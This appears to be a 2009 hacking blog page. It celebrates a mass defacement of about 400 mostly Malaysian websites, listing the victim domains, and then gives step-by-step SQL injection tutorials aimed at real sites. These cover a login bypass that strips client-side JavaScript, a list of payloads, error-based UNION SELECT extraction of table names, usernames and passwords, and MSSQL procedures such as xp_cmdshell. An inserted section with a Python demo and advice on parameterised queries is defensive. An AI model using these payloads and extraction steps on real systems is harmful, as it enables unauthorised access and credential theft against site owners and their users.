Monday, May 18, 2009

More than 400 Websites Hacked Yesterday, the Majority Malaysian

Hi, :) More than 400 websites were mass-defaced by a hacker yesterday, and most of the victims were Malaysian websites. Here is the list of victims; check whether your domain is part of the defacement. Full list of defaced websites after the jump.

Ind0-H4X0R

aboycalledsu.hazardcell.com
g2h.hazardcell.com
hazardcell.com
url.hazardcell.com
tk.hazardcell.com
webbuilder.com.my
orders.webbuilder.com.my
support.webbuilder.com.my
ime.sscity.net
tribezone.net
myhome.net.my
mp3players.allnetweb.info
pvr-sabah.north-borneo.com
ramlanabdullah.fotomomo.com
burnz.teruja.com
emalaysiatravel.gbavatar.com
audio.emirin.name
304.webactives.com
dating-site.date2u.com
secretstrategy.ringgithit.com
eisnetz.com
ramakrishna-sarada.org
alumni.ixora.biz
diyersitzone.net
my.mtsociety.com
blog.reriki.net
cy.mrdefinite.com
blog.teruja.com
susuday.mollique.com
bigcow.mollique.com
sawadeepool.com
kongkong.gbavatar.com
p7.cablefault.net
xchange-i.com
blogrss.bodypowerfc.com
cflee.diyersitzone.net
fotos.dlrg.d-f-n.com
rangsangmas.rajeshpal.com
cft-articles.com
mandarinuniversity.koobros.net
maplestory.gbavatar.com
mensexualhealth.net
procom.mymegashop.com
forex.getprofit.net
shop.makeitlove.com
qionlee.com
proxy.sscity.net
dolphinet.net
planet.tauhoo.com
webactives.com
iklanimej.com
myfriendaddersecret.ringgithit.com
cmaxsoft.com
board.eisnetz.com
go.derrickflc.com
entwurvian.nocturnius.com
amriteswarifoundation.org
nicheinfoproduct.com
perananglobal.com
rajinder.gandhara.org
doe-gis.net
wanida.myrakanit.com
gradhan.com
q2df.com
wangberkat.com
adinfoservices.com
engkabang.net
sahoca.net
blog.gbavatar.com
p1.sawadeepool.com
mollique.com
desirehouse.net
phpnuke.pm10freaks.com
homeideas.myhome.net.my
ainasakina.myfamili.net
www3.drismailtambi.com
alifjohan.myfamili.net
biz.tauhoo.com
photo.emirin.name
suhailaagency.xchange-i.com
ftcomp.com
uniquecanyon.dgvmedia.com
smksb.edu.my
makeitlove.com
projectsecretariat.net
netclicksolution.com
asianmath.com
tactle.com
gandhara.org
gpix.derrickflc.com
acmeuniversity.koobros.net
aprilng.virgiesphere.net
studiow.filament-phase.com
wekgna.com
jordanje.com
stromberg-malaysia.com
linkcom.dgvmedia.com
weightdilemma.com
mpmku.akalkita.com
etacmedia.com
video.emirin.name
gunbound.gbavatar.com
ixoracommy.ixora.biz
firstummah.com
designs.melvinel.com
kuching2u.myhome.net.my
cyberjayaonline.com
mybigcoworg.mollique.com
worldprivilege.dgvmedia.com
halmie.com
archerz.net
forexdaily.3rdpartyexchange.com
project.emirin.name
myfamili.net
indesignbuild.inbanglow.com
ramadhan1428.xchange-i.com
siu.rajeshpal.com
1.mdzakri.com
sar-alhidayah.lamanwebsekolahku.com
loan.ringgithit.com
project.netclicksolution.com
tauhoo.com
nocturnius.com
forum.engkabang.net
citogroup.com.my
prepaid.lorongstadium.com
forum.senilensa.com
118plugins.ringgithit.com
swisscash.halmie.com
download2u.info
getprofit.net
timetothrift.com
home.gandhara.org
senilensa.com
groomingdales.com.my
emirin.name
buyatheme.com
triptomalaysia.webactives.com
acemaildrop.com
koobros.net
heartchambers.lunaireave.com
uptownace.gradhan.com
chungsan.net
rajeshpal.com
loans.ringgithit.com
fabuloushampers.filament-phase.com
mysite2u.biz
dearlainey.drismailtambi.com
koobrosbiz.koobros.net
intouch-logistics.com
img.eisnetz.com
gsus.biz
mpmku.xchange-i.com
meridiantouch.filament-phase.com
mtsociety.com
muftizab.com
tahooorg.tauhoo.com
knightonline.gbavatar.com
shoppe.north-borneo.com
ixora.biz
photos.mrdefinite.com
p9sport.com
i-smartsolutions.com
guestbook.emirin.name
adsense-profits-unlimited.com
hijabhaven.com
eimir.com
borneotransway.com.my
ramadhan.xchange-i.com
nagawerks.com
yippeego.yippeego.com
plaza.abiummi.com
gempaq.us
mohram.filament-phase.com
lotuswell.com
myrakanit.com
karyastudio.drismailtambi.com
tools.eisnetz.com
zhongg.com
free.educationaltoygifts.com
sks.educationaltoygifts.com
m3lvin.org
enochlau.com
filme.d-f-n.com
habbohotel.gbavatar.com
sgt.sabahbiz.com
meatballicious.net
adsenseseo.ringgithit.com
wwluck.etacmedia.com
biase.myxstream.org
female.drismailtambi.com
kelabremajamutiara.com
blog.emirin.name
blog.makeitlove.com
1.lunaireave.com
m203.gandhara.org
myhome.myhome.net.my
cathcollections.com
yippeego.com
forex.3rdpartyexchange.com
onlinestore.diyersitzone.net
vl.bodypowerfc.com
aushk.com
forum.seacoco.com
alphagiga.com
arepie.myxstream.org
pehome.dgvmedia.com
xpatmigrate.com
thenamecard.mysolobiz.com
shamshubaridah.myfamili.net
xiii.myrakanit.com
video.sscity.net
maricatur.mari4syafie.com
ehome.myhome.net.my
5dollar-egold.com
behindnews.emuse.cc
fromborneo.com
jeremiahfoo.emuse.cc
serambetul.com
brilliantcolorsthatyoubring.net
smkcyberjaya.allmoresynergy.com
tajulhealth.com
beautiful.mrdefinite.com
azrinhs.com
ringgithit.mensexualhealth.net
allnetweb.myfancyshop.com
jcc.gandhara.org
gateraiders.com
defirstinn.com.my
jomcode.drismailtambi.com
blog.bodypowerfc.com
2ndstuff.diyersitzone.net
forum.kaerazami.com
joininvest.com
sirehjunjung.com
kristalutama.rajeshpal.com
365.emuse.cc
magnitudesalon.flamingmarket.com
noirmystere.nocturnius.com
skuld.miyabiaizawa.com
davelynne.com
materealize.filament-phase.com
foochowgateway.swancity.net.my
nurarief.intouch-logistics.com
alam3d.com
bahteracappucino.com
kelzero.graveyardstudio.com
cherylsamad.filament-phase.com
xecom.projectsecretariat.net
sk-srikelana.lamanwebsekolahku.com
toolbar.sscity.net
date2u.drismailtambi.com
ustazshukri.drismailtambi.com
tyronmalaysia.filament-phase.com
live.netclicksolution.com
lionsutera.north-borneo.com
mobalex.com.my
emuse.cc
myxstream.org
1u.com.my
rui-en.com
3rdpartyexchange.com
acnewso.ringgithit.com
ramadhan1427.xchange-i.com
myfren.archerz.net
gurdz.gandhara.org
yewkit.com
malaysiaescapade.zodiascape.com
miyabiaizawa.com
minang.educationaltoygifts.com
educationaltoygifts.com
virgiesphere.net
test.senilensa.com
quiz.dlrg.d-f-n.com
myfancyshop.com
theworldsports.com.my
dog2u.myhome.net.my
smgozz.com
chineseknot.biz
kaerazami.filament-phase.com
esafaree.xchange-i.com
blogs.sammichin.com
bodypowerfc.com
wow.gbavatar.com
worldwebmasters.org
dragonflymxs.filament-phase.com
perfectworld.gbavatar.com
multhalib.fotomomo.com
tenggoldives.com
gratechdesign.sabahbiz.com
allmoresynergy.com
mymegashop.com
vertiglobal.drismailtambi.com
egold2u.3rdpartyexchange.com
cablefault.net
dquorum.com
9bw.lunaireave.com
beauty2k.com
rm.bodypowerfc.com
sloppychic.buyatheme.com
4d8888.com
asic.webactives.com
north-borneo.com
surayabatik.filament-phase.com
koobrosinfo.koobros.net
rawr.studio-ksg.net
photo.engkabang.net
mysolobiz.com
events2u.rajeshpal.com
conqueronline.gbavatar.com
photography.mtsociety.com
graveyardstudio.com
teruja.com
filament-phase.com
blog.ringgithit.com
renee-chung.com
prodgprojects.com
solobiz.mysolobiz.com
zodiascape.com
ip.teruja.com
unlimitedprofitstraffic.ringgithit.com
mdzakri.com
digitalzone.biz
no1invest.com
blog.abiummi.com
demam-afcom.jordanje.com
q4hd.q2df.com
seacoco.com
e-picdorlee.com
howmlmgurusgotrich.com
electronics-directory.download2u.info
sammichin.diyersitzone.net
ilammotel.co.nz
reriki.net
akalkita.xchange-i.com
ragnarok.gbavatar.com
blog.diyersitzone.net
ceria.gempaq.us
ou.gradhan.com
millionaire-factory.net
inbanglow.com
blog.filament-phase.com
pbamonline.com
freeon9.q2df.com
gallery.sahoca.net
url.eisnetz.com
jobsmalaysia.download2u.info
bigwheelsabah.com
bigcoworg.mollique.com
julian.bigwheelsabah.com
hasansaid.myfamili.net
lorongstadium.com
suribia.com
matchwonder.mymegashop.com
swancity.net.my
dimira.net
mysecretstrategy.ringgithit.com
ambangideal.com
pssgm.reriki.net
louyau.net
matchmakerz.yippeego.com
engineers-hut.com
pm10freaks.com
mrdefinite.com
gpgc2u.dgvmedia.com
joomla.pm10freaks.com
gallery.miyabiaizawa.com
doa-member.myrakanit.com
blog.azrinhs.com
forums.ti-server.com
chat.netclicksolution.com
bbs.halobi.com
testbbs.halobi.com
calculator.sscity.net
boochang.worldwebmasters.org
dndkl.nagawerks.com
axisgrade.com
fengshui-geomancy.koobros.net
okayarms.jordanje.com
aimm.rajeshpal.com
ericool.webactives.com
electricalshop.com.my
nasa.com.my
test.gandhara.org
flamingmarket.com
addict-logic.net
econcept.dolphinet.net
iccclub.dgvmedia.com
intimanis.com
dgvmedia.com
blogazine.emuse.cc
music.melvinel.com
i-privileges.dgvmedia.com
borneotreasure.com
4irobot.com
biase.myxpitstop.com
tombogroup.filament-phase.com
jomlayanbiz.com
spatialglobe.com
devilro.org
swancitynet.swancity.net.my
youzi.emuse.cc
mobilestore2u.com
studio-ksg.net
lunaireave.com

wahahahaha :) Monitor your PC and your server database, all of you! :P

Sunday, May 17, 2009

United Nations Hacked (Birleşmiş Milletler Hacked / BM Hacked), Ayyıldız Tim, UN Hacked, eno7, thehacker

Cyber protest in the world, Turkish hacker, by m0sted, 1nd0-H4x0R, Ayyıldız Tim, youtube, hacker, zone-h.org, zone-h mirror, kerem125, gsy, m0sted.net, Sagopa Kajmer, Pesimist, 2007, 2008, world peace protest, eno7




Basic Website Account Hacking

If you know some HTML and JavaScript, you can sometimes get into password-protected websites.

To get past a password-protected login, follow these steps:

* Open the website you want to hack and provide a wrong username and password
(e.g. username "me" and password ' or 1=1 --).
An error appears saying the username or password is wrong. Your work starts here.

* Right-click anywhere on that page and choose "View Source".

* There you can see the HTML along with its JavaScript.

* Before touching the login form, copy the URL of the site you are on, so that
the form in your local copy still submits to the real server.

* Then delete the JavaScript that validates what you type before it is sent to
the server. (Do this very carefully; your success depends on how cleanly you
remove the JavaScript that validates the account fields.)

* Then look for the code input name="password" type="password" and edit that
field so it no longer restricts what you can type: if its maxlength is less
than 11, increase it to 11 (the payload ' or 1=1 -- is 11 characters long).

* Go to File => Save As and save the page anywhere on your hard disk with the
extension .htm or .html (e.g. c:\hack.htm).

* Close the original web page and open the copy you saved (e.g. c:\hack.htm).

* You will see some changes compared with the original page. Don't worry.

* Provide any username (e.g. hacker) and the password ' or 1=1 --

Congratulations! If the site was vulnerable, you are now logged in as the first
user stored in the server's database.

Be clear about what the edits above actually do: removing the client-side
JavaScript and raising maxlength only let the payload reach the server
unfiltered. Whether the login succeeds depends entirely on the server building
its SQL query by pasting the password into the query text, which is what the
next section explains. The trick does not work on websites that use newer
techniques to protect their servers. Enjoy!

Hacking Database Servers

Databases are the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get credit card information, and a single hack on a commercial site will bring down its reputation and cost it customers, who want their credit card information kept secure. Most commercial websites use Microsoft SQL Server (MSSQL) or Oracle database servers. MSSQL still owns the market because its price is low, while Oracle servers come at a high price. Some time ago Oracle claimed itself to be "unbreakable", but hackers took that as a challenge and showed lots of bugs in it too. I have been addicted to hacking database servers for a few months now, so I decided to share the knowledge with others. The things discussed here were not discovered by me, but I have experimented with them a lot.

The user types his login name and password on the login.htm page and clicks the Submit button. The values of the two text boxes are passed to logincheck.asp, where they are checked with the query below. If no row satisfies the query, the end of the recordset is reached and a "login failed" message is displayed. Everything seems to be OK. But wait a minute. Think again. Is everything really OK? What about the query? If you have written a page like this, a hacker can log in successfully without knowing the password. How? Let's look at the query again.



"Select * from table1 where login='"&log& "' and password='" &pwd& "' "

Now if a user types his login name as "Chintan" and password as "h4x3r", these values are passed to the ASP page with the POST method and the above query becomes

"Select * from table1 where login='Chintan' and password='h4x3r'"

That's fine. There is a row with Chintan and h4x3r in the login and password columns of the database, so we receive the message "login successful". Now what if I type the login name "Chintan" and, in the password text box,
hi' or 'a'='a ? The query becomes:

"Select * from table1 where login='Chintan' and password='hi' or 'a'='a'"

Submit, and bingo!!!!! I get the message "Login successful"!! Did you see the smartness of the hacker, made possible by the carelessness of the web designer?
The query is satisfied because the condition has changed: now either the password must be 'hi' or 'a' must equal 'a'. Clearly the password is not 'hi', but 'a'='a' is always true, so the whole condition holds (AND binds tighter than OR, so login='Chintan' and password='hi' is evaluated first and the always-true comparison is OR'ed onto it). The hacker is in with login "Chintan"!! If the above doesn't work on some website, you can try the following in the password text box (which one fits depends on how the page quotes and parenthesises its query):

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here -- turns the rest of the query string into a comment, so no further conditions are checked. Similarly you can provide

Chintan ' --
Chintan " --

or other possibilities of that kind in the login name text box, with anything at all as the password, and it might let you in: the query then only checks that the login name is "Chintan" and the rest is ignored because of --. If you are lucky enough to find a website where the web designer made the above mistake, you will be able to log in as any user!!!

IMP NOTE: Hey guys, I have put up a page where you can experiment with the SQL injection vulnerability yourself. Just go to www33.brinkster.com/chintantrivedi/login.htm
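Both the "Basic Website Account Hacking" steps earlier on this page and the logincheck.asp query above come down to one thing: the server pastes the password text into its SQL. The following example is added here and is not from the original page or its author. It rebuilds that query in Python against an in-memory SQLite table called table1 with two constructed rows (the names and passwords are borrowed from this page's own examples), runs the page's payload list against the concatenated query and against a parameterised one, and shows that the client-side edits (deleting JavaScript, raising maxlength) play no part in the outcome. SQLite's handling of ' and -- matches SQL Server closely enough for these payloads; the hi') and hi") variants only pay off when the original query wraps its conditions in parentheses or double quotes, which this one does not, so here they simply fail.

```python
import sqlite3

# Constructed sample data, shaped like the page's "table1": the first row is
# the account an "or 1=1" style payload lands in, exactly as the page says.
SEED_ROWS = [("Chintan", "h4x3r"), ("Rahul", "P455w0rd")]

# The password-box payloads listed on the page, plus the two login-box ones.
PASSWORD_PAYLOADS = [
    "hi' or 'a'='a",
    "hi' or 1=1 --",
    "hi') or ('a'='a",
    'hi" or "a"="a',
    'hi" or 1=1 --',
    'hi") or ("a"="a',
]
LOGIN_PAYLOADS = ["Chintan' --", 'Chintan" --']


def make_db():
    """In-memory stand-in for the site's database (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE table1 (login TEXT, password TEXT)")
    con.executemany("INSERT INTO table1 VALUES (?, ?)", SEED_ROWS)
    return con


def login_vulnerable(con, log, pwd):
    """logincheck.asp as the page describes it: both form fields are
    concatenated straight into the SQL text. Returns the login of the first
    matching row, or None when nothing matches or the SQL fails to parse
    (the page shows 'login failed' in both cases)."""
    sql = ("SELECT login FROM table1 WHERE login='" + log
           + "' AND password='" + pwd + "'")
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def login_safe(con, log, pwd):
    """Same check with bound parameters: the driver sends the values
    separately from the SQL text, so quotes and -- stay plain data."""
    sql = "SELECT login FROM table1 WHERE login=? AND password=?"
    row = con.execute(sql, (log, pwd)).fetchone()
    return row[0] if row else None


def probe(con, login_fn):
    """Run every page payload through login_fn and report which account,
    if any, each one reaches. No client-side check is in the picture: the
    request is built here, just as it would be from a saved local copy of
    the form with the JavaScript stripped out."""
    results = {}
    for pwd in PASSWORD_PAYLOADS:
        results["password=" + pwd] = login_fn(con, "Chintan", pwd)
    for log in LOGIN_PAYLOADS:
        results["login=" + log] = login_fn(con, log, "anything")
    # The first section's recipe: any username plus ' or 1=1 --
    results["password=' or 1=1 --"] = login_fn(con, "hacker", "' or 1=1 --")
    return results


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated query", login_vulnerable),
                     ("parameterised query", login_safe)):
        print(name)
        for payload, account in probe(db, fn).items():
            print("  %-28s -> %s" % (payload, account or "login failed"))
```

Against the concatenated query, the single-quote payloads and the login-box `Chintan' --` all land in an account (the `' or 1=1 --` variants in the first row, Chintan, as the page says), while the double-quote payloads stay inside the single-quoted literal and fail; against the parameterised query every payload fails and only the real password for Rahul gets in.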

More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw how to log in successfully without knowing the password. Now I will show you how to read the whole database just by using queries in the URL!! This works for IIS, i.e. ASP pages backed by SQL Server, and IIS covered roughly 35% of the web market at the time, so you will find a victim after searching only a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45

in a URL. The '?' shows that after it the value 45 is passed to a parameter named id. If that isn't clear, recall the login.htm example above: it had two input text fields named 'login_name' and 'pass', whose values were passed to logincheck.asp. The same thing can be done by opening logincheck.asp directly with
http://www.nosecurity.com/logincheck.as ... pass=h4x3r
in the URL, if the form uses method="get" instead of method="post".

Note: the difference between the GET and POST methods is that POST does not show the values passed to the next page in the URL, while GET does. To understand how they work internally, read the HTTP protocol specifications, RFC 1945 and RFC 2616.

What I mean is that after the '?' the variables used by that page are assigned their values. Above, login_name is given the value Chintan, and different variables are separated by the '&' character.

OK, so coming back: id will mostly be a hidden field whose value changes according to the link you click. The value of id is then used in the query inside mypage.asp, and the result decides which page appears on your screen. If you just change the value of id to 46, you get a different page.
Now let's start hacking the database, using the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

in the URL. INFORMATION_SCHEMA.TABLES is a system view that holds information about all the tables in the current database; its TABLE_NAME column holds the table names. Look at the injected query again:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
Its result is the first table name in INFORMATION_SCHEMA.TABLES. That result is a string (nvarchar), and we are uniting it with 45 (an integer) using UNION, so SQL Server tries to convert the string to int, fails, and gives us an error message like the one below. (For the UNION to be accepted at all, the injected SELECT must return the same number of columns as the page's own query; the example assumes mypage.asp selects a single integer column.)

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'logintable' to a column of data type int.
/mypage.asp, line

From the error it is clear that the first table is 'logintable'. It seems this table might contain login names and passwords :-) So let's look inside it. Type the following in the URL

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field, or column, in logintable is login_id. To get the next column name, type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more column name, 'login_name'. To get the third column name we write

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

That's it. We finally reach the 'passwd' column. Now let's get the login names and
passwords from the table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

That's the login name "Rahul", and to get Rahul's password the query would be

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 passwd FROM logintable
where login_name='Rahul'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! Login name: Rahul, password: P455w0rd. You have cracked the database of
www.nosecurity.com, and it was possible because the user's request was not checked properly. SQL
injection vulnerabilities still exist on many websites. The real fix is to stop building SQL by
concatenating user input: use parameterised queries (or stored procedures called with parameters),
so the database never parses user input as SQL. Filtering out characters such as ', ", -- and ; is
only a weak stopgap that attackers routinely get around. On top of that, the page should not echo
database error messages to the browser (the whole walk above depended on them), and the
application's database login should have no more rights than the page needs.

Part II - using port 1433 (the SQL Server port)
-------------------------------------

Up to now we have seen how to break into the database using malformed URLs, which needs nothing but port 80 (the HTTP port). This time we will talk to the database server directly over its own port. SQL Server accepts client connections on TCP port 1433; UDP port 1434 belongs to the SQL Server Resolution Service, which only tells clients which port a named instance is listening on. Before that, we will see what database servers actually are and how they work, and then how to exploit them!

The designers of MS SQL shipped a number of default stored procedures with the product to make things flexible for web designers. A procedure is nothing but a function that performs some action on the arguments passed to it. These procedures are very important to hackers. Some of the important ones are

sp_password -> Changes the password for a specific login name.
e.g. EXEC sp_password 'oldpass', 'newpass', 'username'

sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables

xp_cmdshell -> Runs an arbitrary operating-system command on the machine (most important). The command runs under the SQL Server service account, which on installations of that era was very often LocalSystem or a local administrator; only members of the sysadmin role may call it, and from SQL Server 2005 onward it is disabled by default and has to be switched on with sp_configure.

xp_msver -> Shows the MS SQL Server version, including all the information about the OS.
e.g. EXEC master..xp_msver

REMEMBER: USE AT YOUR OWN RISK!!!!!!!!